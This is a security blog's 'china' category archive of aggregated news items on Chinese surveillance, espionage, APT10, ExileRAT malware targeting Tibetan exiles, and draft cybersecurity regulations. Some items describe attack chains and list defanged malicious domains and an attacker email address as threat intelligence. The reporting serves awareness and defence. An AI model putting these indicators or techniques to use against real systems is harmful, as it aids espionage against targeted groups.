Category Archives: china

Chinese facial recognition database tracking Muslims left exposed

By Waqas

China is often held responsible for conducting surveillance campaigns and espionage activities discreetly not only on its citizens but governments across continents. Now, a misconfigured facial recognition database has emerged that confirms the allegations put forth against China. Reportedly, a Dutch security researcher has exposed database that contains exclusive details about the deep-rooted surveillance tactics […]

This is a post from HackRead.com Read the original post: Chinese facial recognition database tracking Muslims left exposed

The Internet, Divided Between the US and China, Has Become a Battleground

The global internet is splitting in two. From a report: One side, championed in China, is a digital landscape where mobile payments have replaced cash. Smartphones are the devices that matter, and users can shop, chat, bank and surf the web with one app. The downsides: The government reigns absolute, and it is watching -- you may have to communicate with friends in code. And don't expect to access Google or Facebook. On the other side, in much of the world, the internet is open to all. Users can say what they want, mostly, and web developers can roll out pretty much anything. People accustomed to China's version complain this other internet can seem clunky. You must toggle among apps to chat, shop, bank and surf the web. Some websites still don't seem to be designed with smartphones in mind. The two zones are beginning to clash with the advent of the superfast new generation of mobile technology called 5G. China aims to be the biggest provider of gear underlying the networks, and along with that it is pushing client countries to adopt its approach to the web -- essentially urging some to use versions of the "Great Firewall" that Beijing uses to control its internet and contain the West's influence. Battles are popping up around the world as Chinese tech giants try to use their market power at home to expand abroad, something they've largely failed to do so far. Some Silicon Valley executives worry the divergence risks giving Chinese companies an advantage in new technologies such as artificial intelligence, partly because they face fewer restrictions over privacy and data protection. Further reading: Former Google CEO Eric Schmidt Predicts the Internet Will Split in Two By 2028 -- and One Part Will Be Led By China.

Read more of this story at Slashdot.

The Department of Homeland Security Say Foreign Based VPN’s Pose a Threat to National Security

The US and China tensions continue as the Department of Homeland Security (DHS) seek to tighten their national security against

The Department of Homeland Security Say Foreign Based VPN’s Pose a Threat to National Security on Latest Hacking News.

China and India Lead the Way in Greening

hackingbear writes: The world is literally a greener place than it was twenty years ago, and data from NASA satellites has revealed a counterintuitive source for much of this new foliage. A new study shows that China and India -- the world's most populous countries -- are leading the increase in greening on land. The effect comes mostly from ambitious tree-planting programs in China and intensive agriculture in both countries. Ranga Myneni of Boston University and colleagues first detected the greening phenomenon in satellite data from the mid-1990s, but they did not know whether human activity was a chief cause. The research team found that global green leaf area has increased by 5 percent since the early 2000s, an area equivalent to all of the Amazon rainforests. At least 25 percent of that gain came in China. "China and India account for one-third of the greening, but contain only 9 percent of the planet's land area covered in vegetation," said lead author Chi Chen of Boston University. "That is a surprising finding, considering the general notion of land degradation in populous countries from overexploitation." China's outsized contribution to the global greening trend comes in large part from its programs to conserve and expand forests (about 42 percent of the greening contribution). These programs were developed in an effort to reduce the effects of soil erosion, air pollution, and climate change.

Read more of this story at Slashdot.

3 Things You Need to Know About the Market Today: Xi’s Surprise, US Inflation, Shutdown Saga

1, Chinese President Xi to Join Trade Talks in Beijing Shanghai Composite Index CFD, 4-Hour Chart Analysis Global stocks markets are higher once again today ahead of the US session, boosted by the continued trade-related optimism. The news that Chinese President Xi will unexpectedly attend the current round of US-Chinese trade talks lifted stocks across […]

The post 3 Things You Need to Know About the Market Today: Xi’s Surprise, US Inflation, Shutdown Saga appeared first on Hacked: Hacking Finance.

Ask Slashdot: Is It Ethical To Purchase Electronics Products Made In China?

dryriver writes: A lot of people seem to think it's O.K. to buy electronics made in China. We get to buy products considerably cheaper than we otherwise would, and China by all accounts is growing, developing, and modernizing as a nation due to all the cool stuff they now make for the world. There is only one problem with that reasoning. 21st Century China has an atrocious human rights record, and almost all human rights watchdogs report that China is becoming more and more repressive each year. Freedom House put it this way in 2018: "It's worth noting that, in its attitude toward political dissent, the Chinese Communist Party has proven much harsher than the old Soviet regime of the Brezhnev era. Modern Chinese sentences are longer, the prospects for early release are far worse, and the Chinese authorities are generally unmoved by pleas for leniency from foreign diplomats." Basically, consumer dollars from around the world are not gradually creating a gentler, freer, more prosperous and more modern China at all. They are making the Chinese Communist Party richer, stronger, bolder and more aggressive and repressive in every respect. To the question: knowing what the human rights situation is in China, and that consumer dollars and euros flowing into the country from abroad is making things worse, not better, is it at all ethical to buy electronics or IT products manufactured in China?

Read more of this story at Slashdot.

Forcing the Adversary to Pursue Insider Theft

Jack Crook pointed me toward a story by Christopher Burgess about intellectual property theft by "Hongjin Tan, a 35 year old Chinese national and U.S. legal permanent resident... [who] was arrested on December 20 and charged with theft of trade secrets. Tan is alleged to have stolen the trade secrets from his employer, a U.S. petroleum company," according to the criminal complaint filed by the US DoJ.

Tan's former employer and the FBI allege that Tan "downloaded restricted files to a personal thumb drive." I could not tell from the complaint if Tan downloaded the files at work or at home, but the thumb drive ended up at Tan's home. His employer asked Tan to bring it to their office, which Tan did. However, he had deleted all the files from the drive. Tan's employer recovered the files using commercially available forensic software.

This incident, by definition, involves an "insider threat." Tan was an employee who appears to have copied information that was outside the scope of his work responsibilities, resigned from his employer, and was planning to return to China to work for a competitor, having delivered his former employer's intellectual property.

When I started GE-CIRT in 2008 (officially "initial operating capability" on 1 January 2009), one of the strategies we pursued involved insider threats. I've written about insiders on this blog before but I couldn't find a description of the strategy we implemented via GE-CIRT.

We sought to make digital intrusions more expensive than physical intrusions.

In other words, we wanted to make it easier for the adversary to accomplish his mission using insiders. We wanted to make it more difficult for the adversary to accomplish his mission using our network.

In a cynical sense, this makes security someone else's problem. Suddenly the physical security team is dealing with the worst of the worst!

This is a win for everyone, however. Consider the many advantages the physical security team has over the digital security team.

The physical security team can work with human resources during the hiring process. HR can run background checks and identify suspicious job applicants prior to granting employment and access.

Employees are far more exposed than remote intruders. Employees, even under cover, expose their appearance, likely residence, and personalities to the company and its workers.

Employees can be subject to far more intensive monitoring than remote intruders. Employee endpoints can be instrumented. Employee workspaces are instrumented via access cards, cameras at entry and exit points, and other measures.

Employers can cooperate with law enforcement to investigate and prosecute employees. They can control and deter theft and other activities.

In brief, insider theft, like all "close access" activities, is incredibly risky for the adversary. It is a win for everyone when the adversary must resort to using insiders to accomplish their mission. Digital and physical security must cooperate to leverage these advantages, while collaborating with human resources, legal, information technology, and business lines to wring the maximum results from this advantage.

Australia Investigating Digital Attack Attempt against Federal Parliament

Australia’s security agencies have launched an investigation into a digital attack attempt against the country’s Federal Parliament. Sources told the Australian Broadcasting Company that security personnel caught digital attackers in the early stages of breaking into the Federal Parliament’s computer network. It’s unclear whether bad actors stole any information. As a precaution, authorities reset lawmakers’ […]… Read More

The post Australia Investigating Digital Attack Attempt against Federal Parliament appeared first on The State of Security.

China Hacked Norway’s Visma To Steal Client Secrets, Investigators Say

A prolific espionage group, which the U.S. government believes is Chinese, compromised billion-dollar business service provider Visma in 2018, according to a report by Recorded Future, a threat intelligence firm. From a report: The attack was part of what Western countries said in December is a global hacking campaign by China's Ministry of State Security to steal intellectual property and corporate secrets, according to Recorded Future. China's Ministry of State Security has no publicly available contacts. The foreign ministry did not respond to a request for comment, but Beijing has repeatedly denied any involvement in cyber-enabled spying. Visma took the decision to talk publicly about the breach to raise industry awareness about the hacking campaign, which is known as Cloudhopper and targets technology service and software providers in order reach their clients. Cyber security firms and Western governments have warned about Cloudhopper several times since 2017 but have not disclosed the identities of the companies affected.

Read more of this story at Slashdot.

ExileRAT Malware Targets Tibetan Exile Government

Researchers have discovered a new cyber-espionage campaign targeting the organization representing the exiled Tibetan government.

The post ExileRAT Malware Targets Tibetan Exile Government appeared first on The Security Ledger.

Related Stories

New ExileRAT backdoor used in attacks aimed at users in Tibet

A malware campaign using new LuckyCat-Linked RAT dubbed
ExileRAT has been targeting the mailing list of the organization officially representing the Tibetan government-in-exile.

Security experts at Talos group have uncovered a malware campaign using the ExileRAT backdoor to target the mailing list of the organization officially representing the Tibetan government-in-exile.

Threat actors are delivering the malware via a weaponized Microsoft PowerPoint document, the messages are reaching people in a mailing list run by the Central Tibetan Administration (CTA).

ExileRAT campaign

The nature of malware and the targets suggests the involvement of nationstate actor carrying out a cyber espionage campaign.

Given the nature of the threat and the targets, the campaign was likely designed for espionage purposes, Talos’ security researchers say. 

The bait PowerPoint document is a copy of a legitimate PDF available on CTA’s website, it was sent by attackers to all subscribers to the CTA mailing list,

“Cisco Talos recently observed a malware campaign delivering a malicious Microsoft PowerPoint document using a mailing list run by the Central Tibetan Administration (CTA), an organization officially representing the Tibetan government-in-exile.” reads the analysis published by Talos.

“The document used in the attack was a PPSX file, a file format used to deliver a non-editable slideshow derived from a Microsoft PowerPoint document.”

The experts received an email message from the CTA mailing list containing an attachment, “Tibet-was-never-a-part-of-China.ppsx,” the researchers noticed that the standard Reply-To header used by the CTA mailings was modified to redirect responses to an email address (mediabureauin [at] gmail.com) controlled by the hackers.

The weaponized documents exploit the CVE-2017-0199 flaw, a zero-day
arbitrary code execution vulnerability fixed by Microsoft in April 2017 and that has been actively exploited in attacks in the wild.

The exploit code used by the attackers originated from a public script available on GitHub, researchers noticed that the PPSX also attempts to contact iplocation to perform some geo-location lookups.  

It connects to the command and control (C&C) server to receive a JavaScript script responsible for downloading the final payload. 

The malicious code is executed via WScriptwhile  also utilizing cmd.exe to create a scheduled task called “Diagnostic_System_Host,” the name is
similar to the legitimate system task name “Diagnostic System Host” without the “_” (underscores).

The ExileRAT used in this campaign support commands to retrieve system information (i.e. computer name, username, listing drives, network adapter, and process names), exfiltrate data and and execute or terminate processes.

Talos pointed out that C2 infrastructure has been used in multiple campaigns, including attacks against Tibetan activists leveraging a newer version of the LuckyCat Android RAT.

“This newer version includes the same features as the 2012 version (file uploading, downloading, information stealing and remote shell) and adds several new features, including file removing, app execution, audio recording, personal contact stealing, SMS stealing, recent call stealing and location stealing.” continues the report.

Experts conclude that this new campaign represents an “evolution in a series of attacks targeting a constituency of political supporters, and further evidence that not all attacks require the use of zero-day vulnerabilities,” Talos says. 

The good news is that attackers leveraged an old issue that could be easily detected by up-to-date defense systems. 

Pierluigi Paganini

(SecurityAffairs – hacking, Exilerat)

The post New ExileRAT backdoor used in attacks aimed at users in Tibet appeared first on Security Affairs.

China Will Attempt 30-Plus Launches in 2019, Including Crucial Long March 5 Missions

New submitter starmanaj shares a report: The main contractor for the Chinese space program is planning more than 30 launches in 2019, with major missions including the crucial return-to-flight of the heavy-lift Long March 5 rocket in July. The China Aerospace Science and Technology Corporation (CASC), announced Jan. 29 that it would aim to loft more than 50 spacecraft on 30-plus launches this year. Among these will be the third launch on the Long March 5, a 5-meter-diameter, 57-meter-tall heavy-lift launch vehicle which failed in its second flight in July 2017, delaying the Chang'e-5 lunar sample return mission and the construction of the Chinese Space Station. The mission will take place in July at the coastal Wenchang Satellite Launch Center on Hainan island, CASC vice president Yang Baohua said at a Jan. 29 news conference in Beijing, which also saw the release of a "Blue Book of China Aerospace Science and Technology Activities."

Read more of this story at Slashdot.

DoJ Charges Huawei Execs in Broad Indictment Spanning 10 Years of Criminal Activity

The Department of Justice (DoJ) filed broad charges against Chinese telecom giant Huawei Technologies Co. Ltd. and its CFO Wanzhou Meng for allegedly stealing trade secrets from U.S. mobile firm T-Mobile and deceiving U.S. stakeholders about its business activity in Iran, among a number of other fraud and conspiracy activities over a 10-year...

Read the whole entry... »

Related Stories

Huawei Is Blocked in US, But Its Chips Power Cameras Everywhere

An anonymous reader shares a report: Pelco, a California-based security camera maker, set lofty sales targets last year for a model with sharper video resolution and other cutting-edge features. That was until Congress derailed its plans. In August, updated legislation barred the U.S. military and government from buying tech gear from firms deemed too close to authorities in China. When the bill surfaced, Pelco scrapped any thought of providing its new GPC Professional 4K camera to the U.S. government and lowered its sales goals. The reason: The device uses parts from HiSilicon, the chip division of Huawei. [...] Most of the focus is on Huawei telecom gear that helps run communications networks all over the world. But chips from the HiSilicon unit are also sparking concern because they power about 60 percent of surveillance cameras. That means Chinese chips process video from cameras that sit in places as varied as pizzerias, offices and banks across the U.S.

Read more of this story at Slashdot.

A Tiny Screw Shows Why iPhones Won’t Be ‘Assembled in USA’

An anonymous reader shares a report: Despite a trade war between the United States and China and past admonishments from President Trump "to start building their damn computers and things in this country," Apple is unlikely to bring its manufacturing closer to home. A tiny screw illustrates why. [Editor's note: the link may be paywalled; alternative source.] In 2012, Apple's chief executive, Timothy D. Cook, went on prime-time television to announce that Apple would make a Mac computer in the United States. It would be the first Apple product in years to be manufactured by American workers, and the top-of-the-line Mac Pro would come with an unusual inscription: "Assembled in USA." But when Apple began making the $3,000 computer in Austin, Tex., it struggled to find enough screws, according to three people who worked on the project and spoke on the condition of anonymity because of confidentiality agreements. In China, Apple relied on factories that can produce vast quantities of custom screws on short notice. In Texas, where they say everything is bigger, it turned out the screw suppliers were not. Tests of new versions of the computer were hamstrung because a 20-employee machine shop that Apple's manufacturing contractor was relying on could produce at most 1,000 screws a day. The screw shortage was one of several problems that postponed sales of the computer for months, the people who worked on the project said. By the time the computer was ready for mass production, Apple had ordered screws from China.

Read more of this story at Slashdot.

URLhaus taken down over 100,000 malware websites in 10 months

Researchers, organisations and vendors came together under the project, URLhaus, to bring down sites providing malware content. 100,000 sites were

URLhaus taken down over 100,000 malware websites in 10 months on Latest Hacking News.

China Creates App To Tell You If You’re Near Someone In Debt, Encourages You To Report Them

The Chinese government has developed a mobile app that tells users if they are near someone who is in debt. The app, called a "map of deadbeat debtors," flashes when the user is within 500 meters of a debtor and displays that person's exact location. TechSpot reports: News of the app has caused quite a bit of controversy after it was originally reported by the state-run China Daily. It is an extension to China's existing "social credit" system which scores people based on how they act in public. The app is available through the WeChat platform which has become immensely popular in China. The government stated that "Deadbeat debtors in North China's Hebei province will find it more difficult to abscond as the Higher People's Court of Hebei on Monday introduced" the app. Once a user is alerted that they are close to a debtor, the user can then view their personal information. This will reveal their name, national ID number, and why they were added to the debtor list. The debtor can then be publicly shamed or reported to the authorities if it is deemed that they are capable of repaying their debts.

Read more of this story at Slashdot.

The Messy Truth About Infiltrating Computer Supply Chains

In October last year, Bloomberg Businessweek published an alarming story: Operatives working for China's People's Liberation Army had secretly implanted microchips into motherboards made in China and sold by U.S.-based Supermicro. While Bloomberg's story -- which has been challenged by numerous players -- may well be completely (or partly) wrong, the danger of China compromising hardware supply chains is very real, judging from classified intelligence documents, reports The Intercept. From the report: U.S. spy agencies were warned about the threat in stark terms nearly a decade ago and even assessed that China was adept at corrupting the software bundled closest to a computer's hardware at the factory, threatening some of the U.S. government's most sensitive machines, according to documents provided by National Security Agency whistleblower Edward Snowden. The documents also detail how the U.S. and its allies have themselves systematically targeted and subverted tech supply chains, with the NSA conducting its own such operations, including in China, in partnership with the CIA and other intelligence agencies. The documents also disclose supply chain operations by German and French intelligence. What's clear is that supply chain attacks are a well-established, if underappreciated, method of surveillance -- and much work remains to be done to secure computing devices from this type of compromise. "An increasing number of actors are seeking the capability to target ... supply chains and other components of the U.S. information infrastructure," the intelligence community stated in a secret 2009 report. "Intelligence reporting provides only limited information on efforts to compromise supply chains, in large part because we do not have the access or technology in place necessary for reliable detection of such operations."

Read more of this story at Slashdot.

Caterers in China Are Using AI To Spot Unhygienic Cooks, Report Says

If you've ever harbored doubts about the hygiene of the cooks flipping your burger and frying your fries, you're definitely not the only one. From a report: Thepaper.cn reports that local authorities in eastern China have tapped artificial intelligence (AI) to clamp down on unsanitary cooks in kitchens -- and to reward those who adhere to best practices. According to the report, a camera-based system currently being piloted in the Zhejiang city of Shaoxing automatically recognizes "poor [sanitation] habits" and alerts managers to offending workers via a mobile app. It's reportedly the fruit of a six-year project -- Sunshine Kitchen -- that seeks to bring transparency to food preparation in catering, hotels, school cafeterias, and restaurants.

Read more of this story at Slashdot.

A Look Into Why Free VPN’s Can Cause More Harm Than Good

Intrusion, falsified encryption and lack of transparency are just some of the flaws a user potentially receives with a free

A Look Into Why Free VPN’s Can Cause More Harm Than Good on Latest Hacking News.

China Launches An App Which Works Like A Debtor Radar!






















Giving apps an absolutely new dimension, China recently launched an app which works like a radar for people who are in debt.


Reportedly this application was developed on the instructions of the Chinese police. The app was created in the Chinese province of Hebei.



The application tends to display the locations of people in debt, whenever the person using the app is within 500 yards of them.



The major inspiration behind the application is the need to report the citizens who spend more than they should.



The application which goes by the name of “Map of Deadbeat Debtors” could be accessed via ‘WeChat’. (A social media app)



It's being claimed that the users are instantly alerted via a flash when they stand within 500 meters of a debtor.



The exact location of the debtor is displayed, if there's any appearance of personal information hasn't been confirmed yet.


It's an initiative which works towards citizens keeping a lookout for potential debtors, regardless of the seriousness of the debt.


  
Apparently, owing a debt is considered inappropriate in the culturally rich country of China.



The new reforms in the social credit system of the country are to be held responsible for the idea of the application.




The latest system is just the thing which the country needs and will judge the citizens on the basis of their social behavior.

China Blocks Microsoft’s Bing Search Engine, Despite Offering Censored Results

Update: Microsoft's search engine Bing has been restored in China after being inaccessible in the country for almost two days. According to sources familiar with the matter, Bing was blocked due to an accidental technical error and not due to an attempt at censorship. China has blocked Microsoft-owned search engine Bing, the company confirmed after receiving complaints from users throughout

Microsoft’s Bing Search Engine Goes Offline In China

An anonymous reader quotes a report from France 24: The Microsoft-run search engine Bing was unavailable in mainland China late Wednesday, raising concerns among some social media users that it could be the latest foreign website to be blocked by censors. Attempting to open cn.bing.com results in an error message, though users can still access Bing's international site using a virtual private network (VPN), which allows people to circumvent China's "Great Firewall" of censorship. It is not clear whether or not Bing has joined China's long list of prohibited websites or if its China service is experiencing technical difficulties. On Weibo, China's Twitter-like social media site, people complained about the lack of access, with some speculating that Bing too had been "walled off." Others aired their dissatisfaction about having to use Baidu, China's largest domestic search service. "I can't open Bing, but I don't want to use Baidu -- what to do?" wrote one user. "Bing is actually dead -- is this to force me to use Baidu??" said another, cursing. Update January 24, 00:10 GMT: Microsoft says it is aware that some users are unable to access Bing in China and says it is investigating the matter.

Read more of this story at Slashdot.

Hebei, a Northern Chinese Province, Unveils an App That Triggers a Notification When You’re Near Someone in Debt

China is gearing up to launch a social credit system in 2020, giving all citizens an identity number that will be linked to a permanent record. Like a financial score, everything from paying back loans to behaviour on public transport will be included. One aspect of this social credit system is a new app in the northern province of Hebei. From a report: According to the state-run newspaper China Daily, the Hebei-based app will alert people if there are in 500 metres of someone in debt. It's like being on Oxford Street and being able to work out everyone around you who was in debt. According to the financial charity, the Money Charity, the average UK household debt (including mortgages) was $76,000, in June last year. That's a lot of notifications.

Read more of this story at Slashdot.

3 Things You Need to Know About the Market Today

1, Chinese GDP Growth Slows to Multi-Decade Low Shanghai Composite, 4-Hour Chart Analysis When even the strongly PR-optimized Chinese economic releases are showing severe weakness, it’s not at all surprising that the local stock market is in a deep bear market, and even the explosive oversold rally on Wall Street combined with the trade optimism […]

The post 3 Things You Need to Know About the Market Today appeared first on Hacked: Hacking Finance.

Chinese Scientist Who Gene-Edited Babies Fired by University

A Chinese scientist who created what he said were the world's first "gene-edited" babies evaded oversight and broke ethical boundaries in a quest for fame and fortune, state media said on Monday, as his former university said he had been fired. From a report: He Jiankui said in November that he used a gene-editing technology known as CRISPR-Cas9 to alter the embryonic genes of twin girls born that month, sparking an international outcry about the ethics and safety of such research. Hundreds of Chinese and international scientists condemned He and said any application of gene editing on human embryos for reproductive purposes was unethical. Chinese authorities also denounced He and issued a temporary halt to research activities involving the editing of human genes. He had "deliberately evaded oversight" with the intent of creating a gene-edited baby "for the purpose of reproduction," according to the initial findings of an investigating team set up by the Health Commission of China in southern Guangdong province, Xinhua news agency reported. [...] The Southern University of Science and Technology (SUSTech) in the city of Shenzhen, said in a statement on its website that He had been fired.

Read more of this story at Slashdot.

Foxconn cuts 50,000 contract workers early due to weaker iPhone demand

Foxconn hit by iPhone sales slowdown sheds 50,000 contract workers earlier than expected

Foxconn Technology Group, Apple’s biggest iPhone assembler, has cut around 50,000 of its contract jobs since October 2018 at its most important iPhone factory in Zhengzhou, China, reports Nikkei.

Foxconn generally hires thousands of temporary employees throughout the peak season to meet the seasonal demand of newly released iPhone models. The company typically renews workers’ contracts every month from August until January. The company then reduces the influx of temporary employees once the demand decreases. However, this time around, Foxconn has cut many of those contract jobs months earlier than expected. Weaker demand for the iPhone throughout late 2018 is believed to be the reason behind the cut.

While the size of the cuts is not an issue, it is simply significantly sooner than previous years, the report said, citing an industry source familiar with the situation.

“Normally, the contracts of these workers would be renewed every month from August until mid- to late January, when the workforce is traditionally scaled back for the slow iPhone production season,” the source told Nikkei. “It’s quite different this year to ask assembly line workers to leave before the year-end.” This year, those reductions came as much as three months early.

Foxconn isn’t the only Apple supplier making cuts. A similar story has been witnessed at Pegatron, which is Apple’s second largest iPhone assembler.

A source close to the company [Pegatron] said its normal practice was to reduce the 200,000-strong head count by tens of thousands every month until reaching about 100,000 – the minimum required for daily operation, according to one source familiar with the situation. “And for [2018], it just happened sooner than in the past because of poor demand.”

The story is no different in case of smaller suppliers either.

One key component supplier based in Shenzhen had asked 4,000 workers to take an extended “vacation” from October to March, a person with knowledge of the situation said. “The company has not actively laid off those workers yet. It will decide whether or not to lay them off after March 1,” the source said.

The slow iPhone production sales have come at a time when Foxconn is scaling down its costs by combining its Mac and iPad production lines with those of Dell and Acer. It is looking to cut 100,000 jobs out of a workforce of 1.1 million by the end of 2019 across its associates and subsidiaries.

The post Foxconn cuts 50,000 contract workers early due to weaker iPhone demand appeared first on TechWorm.

The Advanced Persistent Threat files: APT10

We’ve heard a lot about Advanced Persistent Threats (APTs) over the past few years. As a refresher, APTs are prolonged, aimed attacks on specific targets with the intention to compromise their systems and gain information from or about that target. While the targets may be anyone or anything—a person, business, or other organization—APTs are often associated with government or military operations, as they tend to be the organizations with the resources necessary to conduct such an attack. Starting with Mandiant’s APT1 report in 2013, there’s been a continuous stream of exposure of nation-state hacking at scale.

Cybersecurity companies have gotten relatively good at observing and analyzing the tools and tactics of nation-state threat actors; they’re less good at placing these actions in context sufficient enough for defenders to make solid risk assessments. So we’re going to take a look at a few APT groups from a broader perspective and see how they fit into the larger threat landscape.

Today, we’re beginning with APT10. (Note: These groups have a panoply of different names, but for simplicity’s sake, we’re going to borrow Mandiant’s naming conventions for Chinese groups.)

Who is APT10?

First observed in 2009, APT10 is most commonly attributed via open source research to the Chinese Ministry of State Security (MSS). MSS attacks are typically, but not limited to: intelligence targets surrounding trade negotiations, research and development in competition with Chinese commercial entities, and high value counter intelligence targets overseas. As an example of a trade negotiation op, Fidelis Security observed a watering hole attack in February 2017 targeting members of the National Foreign Trade Council, a US trade lobby group.

A commonly-used tool of APT10 is Scanbox, which is a form of malware that can offer insights into their targeting priorities. Scanbox has been observed on assorted industrial sector targets in the US and Japan, but also on Uighur dissidents overseas. While this supports the thesis of APT10 being a government threat group, we caution defenders against associating any one piece of malware exclusively with one group. Countries maintain multiple threat groups, all of whom are fully capable of collaborating and sharing TTPs.

Malware commonly deployed

APT10 is known for deploying the following malware:

Note: Variants of PlugX and Poison Ivy were developed and deployed by Chinese state-sponsored actors. They have since been sold and resold to individual threat actors across multiple nations. At time of writing, it is inappropriate to attribute an attack to Chinese threat actors based on PlugX or Poison Ivy deployment alone.

Should you be worried?

That depends on the type of organization you run. APT10 has been observed to most commonly target construction, engineering, aerospace, and regional telecoms, as well as traditional government targets. If your company exists outside these verticals, it’s unlikely that APT10 would expend the time and resources to target you. For companies outside the targeting profile, it’s much more cost effective to spend defense budgets on common vulnerabilities that are most leveraged by common attackers.

What might they do next?

Like most APTs, APT10 has traditionally targeted at scale when attacking commercial enterprise. However, a more recent report by Price Waterhouse Cooper and BAE Systems suggests that they’ve begin devoting a portion of their operations to targeting Managed Service Providers (MSPs), most likely in an attempt to exfiltrate sensitive client data. Given that there’s been increasing awareness of advanced threats by high-value targets, continuing to target MSPs in this way is a plausible means of obtaining the same desired data at a lesser cost.

Further resources

If you’d like to do some additional reading on APTs, and specifically APT10, take a look at the following resources:

The post The Advanced Persistent Threat files: APT10 appeared first on Malwarebytes Labs.

Marriott breach included 5 million unencrypted passport numbers

Marriott has good news and bad news for travelers who have passed through its hotels. The good news is the data breach disclosed back in November, which was originally believed to have exposed the data of more than 500 million people, affected fewer travelers than originally reported (though it didn't specify how many). The bad news is the data lifted from the company included millions of peoples' passport numbers.

Via: Wall Street Journal

Source: Marriott

DOJ charges two Chinese nationals with ‘extensive’ hacking campaign

Today, the Department of Justice announced charges against Zhu Hua and Zhang Shilong, two Chinese nationals who engaged in an extensive hacking campaign against the US and other countries. First reported by CNBC, the campaign was allegedly successful at infiltrating at least 45 US and global technology companies and government agencies, and these actions were taken at the behest of the Chinese government. Incredibly, the hackers have been operating since 2006 through this year, according to the DOJ. This comes a week after the NSA warned it had evidence of China preparing for "high-profile" cyber-attacks.

Source: Department of Justice

Historical OSINT – Chinese Government Sites Serving Malware

It's 2008 and I'm stumbling upon yet another decent portfolio of compromised malware-serving Chinese government Web sites. In this post I'll discuss in-depth the campaign and provide actionable intelligence on the infrastructure behind it. Compromised Chinese government Web site: hxxp://nynews.gov.cn Sample malicious domains known to have participated in the campaign: hxxp://game1983.com/

Chinese hackers reportedly hit Navy contractors with multiple attacks

Chinese hackers have been targeting US Navy contractors, and were reportedly successful on several occasions over the last 18 months. The infiltrators stole information including missile plans and ship maintenance data, according to a Wall Street Journal report that cites officials and security experts.

Source: Wall Street Journal

US government accuses Chinese hackers of stealing jet engine IP

The Justice Department has charged ten Chinese nationals -- two of which are intelligence officers -- of hacking into and stealing intellectual property from a pair of unnamed US and French companies between January 2015 to at least May of 2015. The hackers were after a type of turbofan (portmanteau of turbine and fan), a large commercial airline engine, to either circumvent its own development costs or avoid having to buy it. According to the complaint by the Department of Justice, a Chinese aerospace manufacturer was simultaneously working on making a comparable engine. The hack afflicted unnamed aerospace companies located in Arizona, Massachusetts and Oregon.

Via: ZD Net

Source: US Department of Justice

US intelligence chief says ‘no evidence’ of Chinese spy chips

Dan Coats, the US director of national intelligence, said there's "no evidence" that Chinese spies tampered with servers bought by up to 30 companies, including the likes of Apple and a telecom provider, as Bloomberg reported earlier this month. However, he told Cyberscoop that "we're not taking anything for granted. We haven't seen anything, but we're always watching."

Via: The Verge

Source: Cyberscoop

Apple CEO calls on Bloomberg to retract China surveillance report

Earlier this month, Bloomberg reported that San Jose-based server company Super Micro installed surveillance micro-chips in the Chinese data center hardware of up to 30 companies, including Amazon and Apple. These chips were supposedly used to steal intellectual property. However, all companies that were named in the initial report have denied Bloomberg's claims. Now, Apple CEO Tim Cook is calling on the well-reputed publication to retract its story altogether, according to BuzzFeed News.

Source: BuzzFeed News

China Publishes the Draft Regulations on the Classified Protection of Cybersecurity

On June 27, 2018, the Ministry of Public Security of the People’s Republic of China published the Draft Regulations on the Classified Protection of Cybersecurity (网络安全等级保护条例(征求意见稿)) (“Draft Regulation”) and is seeking comments from the public by July 27, 2018.

Pursuant to Article 21 of the Cybersecurity Law, the Draft Regulation establishes the classified protection of cybersecurity. The classified protection of information security scheme was previously implemented under the Administrative Measures for the Classified Protection of Information Security. The Draft Regulation extends targets of security protection from just computer systems to anything related to construction, operation, maintenance and use of networks, such as cloud computing, big data, artificial intelligence, Internet of Things, project control systems and mobile Internet, except those set up by individuals and families for personal use.

The obligations of network operators include, but are not limited to, (1) grade confirmation and filing; (2) security construction and ratification; (3) grade assessment; (4) self-inspection; (5) protection of network infrastructure, network operation, and data and information; (6) effective handling of network safety accidents; and (7) guarding against network crimes, all of which vary across the classified levels where the network operators are graded.

Network Operator Compliance

  • Classified Levels. The network operator must ascertain its security level in the planning and design phase. The network is classified by five levels for the degree of security protection as shown below.

Explanation of terms such as “object” and “degree of injury” can be found in Draft Information Security Technology-Guidelines for Grading of Classified Cybersecurity Protection, which closed for public comment on March 5, 2018.

  • Grading Review. The considerations for classified level grading include network functions, scope of services, types of service recipients and types of data being processed. For networks graded at Level 2 or above, the operator is required to conduct an expert review and then obtain approval from any relevant industry regulator. Cross provincial or national uniform connected networks must be graded and organized for review by the industry regulator.
  • Grading Filing. After grading review, any networks graded at Level 2 or above must file with a public security authority at or above county level, after confirmation of the classified level. The filing certificate should be issued after satisfactory review by the relevant public security authority. The timeline for the relevant public security authority to review such applications is not defined in the Draft Regulation, and is within the authority’s discretion.
  • General Obligations of Cybersecurity Protection. Most of the general cybersecurity obligations are stated in the Cybersecurity Law, and the Draft Regulation stipulates additional obligations, such as:
    • In the event of detection, blocking or elimination of illegal activity, network operators must prevent illegal activity from spreading and preventthe destruction or loss of evidence of crimes.
    • File network records.
    • Report online events to the local public security authority with jurisdiction within 24 hours. To prevent divulging state secrets, reports should be made to the local secrecy administration with jurisdiction at the same time.
  • Special Obligations of Security Protection. The networks graded at Level 3 or above require a higher standard for their network operators, which will bear general liability and special liability, including:
    • designating the department of cybersecurity and forming a level-by-level examination system for any change of network, access, operation and maintenance provider;
    • reviewing the plan or strategy developed by professional technical personnel;
    • conducting a background check on key cybersecurity personnel, and confirming those personnel have relevant professional certificates;
    • managing the security of of service providers;
    • dynamically monitoring the network and establishing a connection with the public security authority at the same level;
    • implementing redundancy, back-up and recovery measures for important network equipment, communications links and systems; and
    • establishing a classified assessment scheme, conducting such assessments, rectifying the results, and reporting the information to relevant authorities.
  • Online Testing Before Operation. Network operators at Level 2 or above must test the security of new networks before operation. Assessments must be performed at least once a year. For new networks at Level 3 or above, the classified assessment must be conducted by a cybersecurity classified assessment entity before operation and annually thereafter. Based on the results, the network operators must rectify the risks and report to the public security authority with its filing records.
  • Procurement. The network products used for the “important part” of the network must be evaluated by a professional assessment entity. If a product has an impact on national security, it must be checked by state cyberspace authorities and relevant departments of State Counsel. The Draft Regulation does not clearly define what the “important part” of a network means.
  • Maintenance. Maintenance of networks graded at Level 3 or above must be conducted in China. If business needs require cross-border maintenance, cybersecurity evaluations and risk control measures must take place before performance of such cross-border maintenance. Maintenance records must be kept for public security’s inspection.
  • Protection of Data and Information Security. Network operators must protect the security of their data and information in the process of collection, storage, transmission, use, supply and destruction, and keep recovery and backup files in a different place. Personal information protection requirements in the Draft Regulation are similar to those found under the Cybersecurity Law.
